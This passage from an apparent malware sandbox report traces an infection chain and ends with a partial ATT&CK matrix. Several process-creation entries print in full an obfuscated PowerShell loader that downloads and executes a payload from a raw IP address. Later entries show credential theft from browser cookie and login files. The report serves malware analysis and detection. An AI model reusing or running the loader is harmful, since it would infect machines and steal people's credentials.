;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(DJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeProcess created: C:\Windows\SysWOW64\recover.exe "C:\Windows\SysWOW64\recover.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\recover.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$caked124 = 1;$allegroernes15='s';$allegroernes15+='ubstrin';$allegroernes15+='g';function unkaiserlike($micrometeoroid){$specialuddannelser=$micrometeoroid.length-$caked124;for($presaged=1; $presaged -lt $specialuddannelser; $presaged+=(2)){$vedic+=$micrometeoroid.$allegroernes15.invoke($presaged, $caked124);}$vedic;}function hydrolyzable($superheater){. ($porsitets) ($superheater);}$alcoholmeter=unkaiserlike ',m olzgifldl,a,/ 5 . 0v f(,w,iknud o.wkss fnstb ,1.0,.t0,;s qwfisna6c4 ;c fx 6h4v; sr.v :.1 2 1k.b0a), bgpe,crk.ot/ 2h0 1,0 0n1 0a1d uf i r,eufvo.x./h1 2,1s.a0, ';$nonattribution175=unkaiserlike '.u sme r -pa gde.ndtb ';$leggiest89=unkaiserlike 'hh t t p :t/,/.8s7c.c1s2,1,. 1k0s5t.,1 6p3 / d,o m ksappkibt,l e rb.fmis ia ';$heitiki=unkaiserlike 't>s ';$porsitets=unkaiserlike ' iuelx ';$mediaevalism='garapato';hydrolyzable (unkaiserlike 'rsce,ts- cyocnet.e,n.t, c- p aat.hs tp:j\ juo.rbdmk l o,dae,r . t.xntc a-,v,all.u.ee .$,m e.daita ebvsajl.ihsnmu; ');hydrolyzable (unkaiserlike ' i f ( t e sft -ap,a.t h, rtg:e\ j onr d,k lbofdfedro.,tpx.tl)f{ egxsi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cdh.o. n%,a p.p,d aotfa.% \ t hlewrsmmorsgwdist c.hm1b7 2i. mie d, t&p&e be.cuhfof ,$. ';hydrolyzable (unkaiserlike '.$.gqlcopbpaclb:,all gru mm=a( chm dh / c $ml,aanrdpian g s.p.r.otc,eodmuar,ekr n,ets ) ');hydrolyzable (unkaiserlike ' $ g lso b a lu:ld.a t,atmaagssk i n e rinne,=n$ lseag,g i e,sdtf8o9e. s,pdlsi t (.$,h e ictai ksi,). ');$leggiest89=$datamaskinerne[0];hydrolyzable (unkaiserlike ' $gg l o b a,lk:.rji p phlaesrms.=cn e,w,-,orb.j e cftb sdyasmtpe ms.sn e tk.bwne,bgc lsi eknbtf ');hydrolyzable (unkaiserlike 'u$ir ijp p l e rcsl.rh.e,ard,e r sf[.$bnsovnmabt t,rii baudt ido nf1s7d5 ]p=s$eavl,c.o.hro lhmse,the r ');$entertaineres=unkaiserlike 'sr ihpapwl e,rvs . dsorwwn,l.osa,difsivl es(a$ l e g,gcibess tc8 9p,e$nl u,fkton irn,gdedr,s 1 8 5,)s ';$entertaineres=$algum[1]+$entertaineres;$luftningers185=$algum[0];hydrolyzable (unkaiserlike ',$ g,l.o,b,agl :,p rlo,p a gae r,e.nrd e =g(.tuecs tn-,p a,t h $ lpucfktdnsi,ngg efr sf1t8i5l) ');while (!$propagerende) {hydrolyzable (unkaiserlike ' $sgcl odbsafls:.v iud.e lcyhsrtbe nq=c$ft,r upei ') ;hydrolyzable $entertaineres;hydrolyzable (unkaiserlike ' s.t a r tu-,stl.ele.ph s4 ');hydrolyzable (unkaiserlike ',$ g leo b.a le:op,rnopp,asgte r.e n dee,= (pt,e srtf-.poa tphv b$fl u,fttbn i n,g egrusb1o8.5 )r ') ;hydrolyzable (unkaiserlike ' $mgal ovb aslk: d.e.cnatnsaulj=m$bgnl,oibeaal,:fa.lfgnosr.itstttikcc+ +r% $ dyast asmna.spk ivnne ronfe .,c,otu.n tp ') ;$leggiest89=$datamaskinerne[$decanal];}hydrolyzable (unkaiserlike ' $tg.lpo bsacls:stbr aun sfpsast ruocn.itzpe d, a=. ,gaekt - c,oan,t edn tp t$tlaunfttfn ian g ear s 1j8s5 ');hydrolyzable (unkaiserlike 'p$.galpotb aolb:fu n.laa i,df =s m[.s,ylsbt.eam ..cuo n vre.r.t.],: : f rbo m bga sce,6c4,sst r.itntgp(d
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$caked124 = 1;$allegroernes15='s';$allegroernes15+='ubstrin';$allegroernes15+='g';function unkaiserlike($micrometeoroid){$specialuddannelser=$micrometeoroid.length-$caked124;for($presaged=1; $presaged -lt $specialuddannelser; $presaged+=(2)){$vedic+=$micrometeoroid.$allegroernes15.invoke($presaged, $caked124);}$vedic;}function hydrolyzable($superheater){. ($porsitets) ($superheater);}$alcoholmeter=unkaiserlike ',m olzgifldl,a,/ 5 . 0v f(,w,iknud o.wkss fnstb ,1.0,.t0,;s qwfisna6c4 ;c fx 6h4v; sr.v :.1 2 1k.b0a), bgpe,crk.ot/ 2h0 1,0 0n1 0a1d uf i r,eufvo.x./h1 2,1s.a0, ';$nonattribution175=unkaiserlike '.u sme r -pa gde.ndtb ';$leggiest89=unkaiserlike 'hh t t p :t/,/.8s7c.c1s2,1,. 1k0s5t.,1 6p3 / d,o m ksappkibt,l e rb.fmis ia ';$heitiki=unkaiserlike 't>s ';$porsitets=unkaiserlike ' iuelx ';$mediaevalism='garapato';hydrolyzable (unkaiserlike 'rsce,ts- cyocnet.e,n.t, c- p aat.hs tp:j\ juo.rbdmk l o,dae,r . t.xntc a-,v,all.u.ee .$,m e.daita ebvsajl.ihsnmu; ');hydrolyzable (unkaiserlike ' i f ( t e sft -ap,a.t h, rtg:e\ j onr d,k lbofdfedro.,tpx.tl)f{ egxsi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cdh.o. n%,a p.p,d aotfa.% \ t hlewrsmmorsgwdist c.hm1b7 2i. mie d, t&p&e be.cuhfof ,$. ';hydrolyzable (unkaiserlike '.$.gqlcopbpaclb:,all gru mm=a( chm dh / c $ml,aanrdpian g s.p.r.otc,eodmuar,ekr n,ets ) ');hydrolyzable (unkaiserlike ' $ g lso b a lu:ld.a t,atmaagssk i n e rinne,=n$ lseag,g i e,sdtf8o9e. s,pdlsi t (.$,h e ictai ksi,). ');$leggiest89=$datamaskinerne[0];hydrolyzable (unkaiserlike ' $gg l o b a,lk:.rji p phlaesrms.=cn e,w,-,orb.j e cftb sdyasmtpe ms.sn e tk.bwne,bgc lsi eknbtf ');hydrolyzable (unkaiserlike 'u$ir ijp p l e rcsl.rh.e,ard,e r sf[.$bnsovnmabt t,rii baudt ido nf1s7d5 ]p=s$eavl,c.o.hro lhmse,the r ');$entertaineres=unkaiserlike 'sr ihpapwl e,rvs . dsorwwn,l.osa,difsivl es(a$ l e g,gcibess tc8 9p,e$nl u,fkton irn,gdedr,s 1 8 5,)s ';$entertaineres=$algum[1]+$entertaineres;$luftningers185=$algum[0];hydrolyzable (unkaiserlike ',$ g,l.o,b,agl :,p rlo,p a gae r,e.nrd e =g(.tuecs tn-,p a,t h $ lpucfktdnsi,ngg efr sf1t8i5l) ');while (!$propagerende) {hydrolyzable (unkaiserlike ' $sgcl odbsafls:.v iud.e lcyhsrtbe nq=c$ft,r upei ') ;hydrolyzable $entertaineres;hydrolyzable (unkaiserlike ' s.t a r tu-,stl.ele.ph s4 ');hydrolyzable (unkaiserlike ',$ g leo b.a le:op,rnopp,asgte r.e n dee,= (pt,e srtf-.poa tphv b$fl u,fttbn i n,g egrusb1o8.5 )r ') ;hydrolyzable (unkaiserlike ' $mgal ovb aslk: d.e.cnatnsaulj=m$bgnl,oibeaal,:fa.lfgnosr.itstttikcc+ +r% $ dyast asmna.spk ivnne ronfe .,c,otu.n tp ') ;$leggiest89=$datamaskinerne[$decanal];}hydrolyzable (unkaiserlike ' $tg.lpo bsacls:stbr aun sfpsast ruocn.itzpe d, a=. ,gaekt - c,oan,t edn tp t$tlaunfttfn ian g ear s 1j8s5 ');hydrolyzable (unkaiserlike 'p$.galpotb aolb:fu n.laa i,df =s m[.s,ylsbt.eam ..cuo n vre.r.t.],: : f rbo m bga sce,6c4,sst r.itntgp(d
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$caked124 = 1;$allegroernes15='s';$allegroernes15+='ubstrin';$allegroernes15+='g';function unkaiserlike($micrometeoroid){$specialuddannelser=$micrometeoroid.length-$caked124;for($presaged=1; $presaged -lt $specialuddannelser; $presaged+=(2)){$vedic+=$micrometeoroid.$allegroernes15.invoke($presaged, $caked124);}$vedic;}function hydrolyzable($superheater){. ($porsitets) ($superheater);}$alcoholmeter=unkaiserlike ',m olzgifldl,a,/ 5 . 0v f(,w,iknud o.wkss fnstb ,1.0,.t0,;s qwfisna6c4 ;c fx 6h4v; sr.v :.1 2 1k.b0a), bgpe,crk.ot/ 2h0 1,0 0n1 0a1d uf i r,eufvo.x./h1 2,1s.a0, ';$nonattribution175=unkaiserlike '.u sme r -pa gde.ndtb ';$leggiest89=unkaiserlike 'hh t t p :t/,/.8s7c.c1s2,1,. 1k0s5t.,1 6p3 / d,o m ksappkibt,l e rb.fmis ia ';$heitiki=unkaiserlike 't>s ';$porsitets=unkaiserlike ' iuelx ';$mediaevalism='garapato';hydrolyzable (unkaiserlike 'rsce,ts- cyocnet.e,n.t, c- p aat.hs tp:j\ juo.rbdmk l o,dae,r . t.xntc a-,v,all.u.ee .$,m e.daita ebvsajl.ihsnmu; ');hydrolyzable (unkaiserlike ' i f ( t e sft -ap,a.t h, rtg:e\ j onr d,k lbofdfedro.,tpx.tl)f{ egxsi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cdh.o. n%,a p.p,d aotfa.% \ t hlewrsmmorsgwdist c.hm1b7 2i. mie d, t&p&e be.cuhfof ,$. ';hydrolyzable (unkaiserlike '.$.gqlcopbpaclb:,all gru mm=a( chm dh / c $ml,aanrdpian g s.p.r.otc,eodmuar,ekr n,ets ) ');hydrolyzable (unkaiserlike ' $ g lso b a lu:ld.a t,atmaagssk i n e rinne,=n$ lseag,g i e,sdtf8o9e. s,pdlsi t (.$,h e ictai ksi,). ');$leggiest89=$datamaskinerne[0];hydrolyzable (unkaiserlike ' $gg l o b a,lk:.rji p phlaesrms.=cn e,w,-,orb.j e cftb sdyasmtpe ms.sn e tk.bwne,bgc lsi eknbtf ');hydrolyzable (unkaiserlike 'u$ir ijp p l e rcsl.rh.e,ard,e r sf[.$bnsovnmabt t,rii baudt ido nf1s7d5 ]p=s$eavl,c.o.hro lhmse,the r ');$entertaineres=unkaiserlike 'sr ihpapwl e,rvs . dsorwwn,l.osa,difsivl es(a$ l e g,gcibess tc8 9p,e$nl u,fkton irn,gdedr,s 1 8 5,)s ';$entertaineres=$algum[1]+$entertaineres;$luftningers185=$algum[0];hydrolyzable (unkaiserlike ',$ g,l.o,b,agl :,p rlo,p a gae r,e.nrd e =g(.tuecs tn-,p a,t h $ lpucfktdnsi,ngg efr sf1t8i5l) ');while (!$propagerende) {hydrolyzable (unkaiserlike ' $sgcl odbsafls:.v iud.e lcyhsrtbe nq=c$ft,r upei ') ;hydrolyzable $entertaineres;hydrolyzable (unkaiserlike ' s.t a r tu-,stl.ele.ph s4 ');hydrolyzable (unkaiserlike ',$ g leo b.a le:op,rnopp,asgte r.e n dee,= (pt,e srtf-.poa tphv b$fl u,fttbn i n,g egrusb1o8.5 )r ') ;hydrolyzable (unkaiserlike ' $mgal ovb aslk: d.e.cnatnsaulj=m$bgnl,oibeaal,:fa.lfgnosr.itstttikcc+ +r% $ dyast asmna.spk ivnne ronfe .,c,otu.n tp ') ;$leggiest89=$datamaskinerne[$decanal];}hydrolyzable (unkaiserlike ' $tg.lpo bsacls:stbr aun sfpsast ruocn.itzpe d, a=. ,gaekt - c,oan,t edn tp t$tlaunfttfn ian g ear s 1j8s5 ');hydrolyzable (unkaiserlike 'p$.galpotb aolb:fu n.laa i,df =s m[.s,ylsbt.eam ..cuo n vre.r.t.],: : f rbo m bga sce,6c4,sst r.itntgp(dJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$caked124 = 1;$allegroernes15='s';$allegroernes15+='ubstrin';$allegroernes15+='g';function unkaiserlike($micrometeoroid){$specialuddannelser=$micrometeoroid.length-$caked124;for($presaged=1; $presaged -lt $specialuddannelser; $presaged+=(2)){$vedic+=$micrometeoroid.$allegroernes15.invoke($presaged, $caked124);}$vedic;}function hydrolyzable($superheater){. ($porsitets) ($superheater);}$alcoholmeter=unkaiserlike ',m olzgifldl,a,/ 5 . 0v f(,w,iknud o.wkss fnstb ,1.0,.t0,;s qwfisna6c4 ;c fx 6h4v; sr.v :.1 2 1k.b0a), bgpe,crk.ot/ 2h0 1,0 0n1 0a1d uf i r,eufvo.x./h1 2,1s.a0, ';$nonattribution175=unkaiserlike '.u sme r -pa gde.ndtb ';$leggiest89=unkaiserlike 'hh t t p :t/,/.8s7c.c1s2,1,. 1k0s5t.,1 6p3 / d,o m ksappkibt,l e rb.fmis ia ';$heitiki=unkaiserlike 't>s ';$porsitets=unkaiserlike ' iuelx ';$mediaevalism='garapato';hydrolyzable (unkaiserlike 'rsce,ts- cyocnet.e,n.t, c- p aat.hs tp:j\ juo.rbdmk l o,dae,r . t.xntc a-,v,all.u.ee .$,m e.daita ebvsajl.ihsnmu; ');hydrolyzable (unkaiserlike ' i f ( t e sft -ap,a.t h, rtg:e\ j onr d,k lbofdfedro.,tpx.tl)f{ egxsi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cdh.o. n%,a p.p,d aotfa.% \ t hlewrsmmorsgwdist c.hm1b7 2i. mie d, t&p&e be.cuhfof ,$. ';hydrolyzable (unkaiserlike '.$.gqlcopbpaclb:,all gru mm=a( chm dh / c $ml,aanrdpian g s.p.r.otc,eodmuar,ekr n,ets ) ');hydrolyzable (unkaiserlike ' $ g lso b a lu:ld.a t,atmaagssk i n e rinne,=n$ lseag,g i e,sdtf8o9e. s,pdlsi t (.$,h e ictai ksi,). ');$leggiest89=$datamaskinerne[0];hydrolyzable (unkaiserlike ' $gg l o b a,lk:.rji p phlaesrms.=cn e,w,-,orb.j e cftb sdyasmtpe ms.sn e tk.bwne,bgc lsi eknbtf ');hydrolyzable (unkaiserlike 'u$ir ijp p l e rcsl.rh.e,ard,e r sf[.$bnsovnmabt t,rii baudt ido nf1s7d5 ]p=s$eavl,c.o.hro lhmse,the r ');$entertaineres=unkaiserlike 'sr ihpapwl e,rvs . dsorwwn,l.osa,difsivl es(a$ l e g,gcibess tc8 9p,e$nl u,fkton irn,gdedr,s 1 8 5,)s ';$entertaineres=$algum[1]+$entertaineres;$luftningers185=$algum[0];hydrolyzable (unkaiserlike ',$ g,l.o,b,agl :,p rlo,p a gae r,e.nrd e =g(.tuecs tn-,p a,t h $ lpucfktdnsi,ngg efr sf1t8i5l) ');while (!$propagerende) {hydrolyzable (unkaiserlike ' $sgcl odbsafls:.v iud.e lcyhsrtbe nq=c$ft,r upei ') ;hydrolyzable $entertaineres;hydrolyzable (unkaiserlike ' s.t a r tu-,stl.ele.ph s4 ');hydrolyzable (unkaiserlike ',$ g leo b.a le:op,rnopp,asgte r.e n dee,= (pt,e srtf-.poa tphv b$fl u,fttbn i n,g egrusb1o8.5 )r ') ;hydrolyzable (unkaiserlike ' $mgal ovb aslk: d.e.cnatnsaulj=m$bgnl,oibeaal,:fa.lfgnosr.itstttikcc+ +r% $ dyast asmna.spk ivnne ronfe .,c,otu.n tp ') ;$leggiest89=$datamaskinerne[$decanal];}hydrolyzable (unkaiserlike ' $tg.lpo bsacls:stbr aun sfpsast ruocn.itzpe d, a=. ,gaekt - c,oan,t edn tp t$tlaunfttfn ian g ear s 1j8s5 ');hydrolyzable (unkaiserlike 'p$.galpotb aolb:fu n.laa i,df =s m[.s,ylsbt.eam ..cuo n vre.r.t.],: : f rbo m bga sce,6c4,sst r.itntgp(dJump to behavior
        Source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000000.2509121422.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358486473.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2711954327.00000000016B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
        Source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000000.2509121422.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358486473.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2711954327.00000000016B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000000.2509121422.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358486473.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2711954327.00000000016B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000000.2509121422.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358486473.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2711954327.00000000016B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information32
        Scripting
        Valid Accounts11
        Windows Management Instrumentation
        32
        Scripting
        1
        Abuse Elevation Control Mechanism
        1
        Deobfuscate/Decode Files or Information
        1
        OS Credential Dumping
        2
        File and Directory Discovery
        Remote Services1
        Archive Collected Data
        3
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Abuse Elevation Control Mechanism
